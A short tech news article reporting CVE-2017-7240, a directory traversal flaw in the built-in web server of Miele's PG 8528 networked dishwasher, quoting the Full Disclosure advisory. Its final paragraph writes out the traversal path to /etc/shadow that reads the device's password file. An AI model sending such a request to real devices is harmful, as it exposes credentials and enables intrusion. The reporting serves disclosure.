Don't say you weren't warned: Miele went full Internet-of-Things with a network-connected dishwasher, gave it a web server, and now finds itself on the wrong end of a security bug report – and it's accused of ignoring the warning.
The utterly predictable vulnerability advisory on the Full Disclosure mailing list details CVE-2017-7240 – aka "Miele Professional PG 8528 - Web Server Directory Traversal.” This is the builtin web server that's used to remotely control the glassware-cleaning machine from a browser.
“The corresponding embedded Web server 'PST10 WebServer' typically listens to port 80 and is prone to a directory traversal attack, therefore an unauthenticated attacker may be able to exploit this issue to access sensitive information to aide in subsequent attacks,” reads the notice, dated Friday.
This attack was the 'sploit hotness in 1997. Congratulations, Miele: you have a 20 year old security bug in your shiny brand new dishwasher.Proving it for yourself is simple: Using a basic HTTP GET, fetch.../../../../../../../../../../../../../etc/shadow...from whichever IP address the dishwasher has on your network to reveal the shadow password file on its file system. That's pretty sad.